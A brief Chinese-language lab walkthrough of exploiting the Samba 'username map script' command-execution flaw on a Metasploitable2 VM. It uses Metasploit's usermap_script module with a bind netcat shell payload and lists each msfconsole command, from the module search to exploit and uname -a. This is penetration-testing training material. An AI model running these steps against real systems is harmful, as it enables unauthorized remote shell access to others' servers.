Metasploit Samba服务器漏洞渗透
Contents
攻击机:BlackArch
靶机:Metasploitable2
工具:msfconsole
BlackArch的版本信息
打开Metasploitable2后,ifconfig查看ip
查看BlackArch的ip
打开msfmsfconsole
help search
search samba
在显示的模块中找到找到exploit/multi/samba/usermap_script 2007-05-14 excellent Samba “username map script” Command Execution
之后选择渗透攻击模块use multi/samba/usermap_script
显示攻击模块配套的攻击载荷show payloads
set payload cmd/unix/bind_netcat
查看配置参数show options
设置靶机的ipset RHOST 192.168.10.131
攻击
exploit
攻击成功后,查看当前版本和用户
uname -a